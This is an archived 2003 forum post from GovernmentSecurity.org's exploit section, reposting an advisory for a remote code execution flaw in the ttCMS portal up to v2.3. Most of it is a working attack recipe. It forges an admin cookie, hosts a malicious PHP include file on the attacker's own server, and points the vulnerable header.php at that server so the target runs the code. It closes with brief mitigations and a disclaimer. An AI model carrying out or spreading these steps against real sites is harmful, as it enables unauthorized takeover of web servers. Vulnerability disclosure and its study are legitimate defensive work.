Remote code execution in ttCMS <=v2.3

Full Version: Remote code execution in ttCMS <=v2.3

GovernmentSecurity.org > The Archives > Exploit Articles

GSecur

May 17 2003, 09:47 PM

New exploit for the ttCMS web portal system.

Website: http://www.ttcms.com/
Demo Site: http://demosite.ttcms.com/index.php

Programs Mentioned in this article are mirrored here at GovernmentSecurity.org

Download Proxomitron

Download Anonymity4Proxy

Exploit:

QUOTE

Advisory name: Remote code execution in ttCMS 2.2.0/2.2.1
Application: ttCMS v2.3 (and older versions)
Vendor: www.ttcms.com
Status: Vendor was contacted but didn't reply - after posting about another hole on his forums, my account was banned
Impact: Attacker can execute arbitrary php code
Platform(s): Unix

Technical description:
----------------------

Everybody can inject PHP code in ttCMS through the file "header.php" which can be found in the directory admin/templates/

header.php:
------------------------------------------
(Line #002) if ($HTTP_COOKIE_VARS["ttcms_user_admin"] > 0) { (Line #003) include_once("$admin_root/templates/header.inc.php");
(Line #004) } else {
(Line #005) header("Location: $admin_root_url/login.php"); (Line #006) exit; (Line #007) }
------------------------------------------

all you have to do is to send a fake cookie containing

------------------------------------------
ttcms_user_admin=1
------------------------------------------

(this can easily be done by using a tool like Proxomitron or
Anonymity4Proxy)

In order to exploit this vulnerability, you have to create a
file "templates/header.inc.php" on your own webserver,
which contains the code you want to execute on the target-system.

If you now call the file "header.php" like this:

------------------------------------------
http://target/admin/templates/header.php?a...p://yourserver/
------------------------------------------

the code in "templates/header.inc.php" on your own webserver will be
injected. (of course, PHP Execution must be disabled on your machine or you must use a ftp-Server to store the file you want to inject)

Recommendations:
----------------
Run ttCMS on a secure environment.
Disable register_globals in php.ini
Update to a newer version of ttCMS (currently, none exists)

--
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

Remember this site provides this information for education not destruction. If you find vunrable sites inform the admins.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.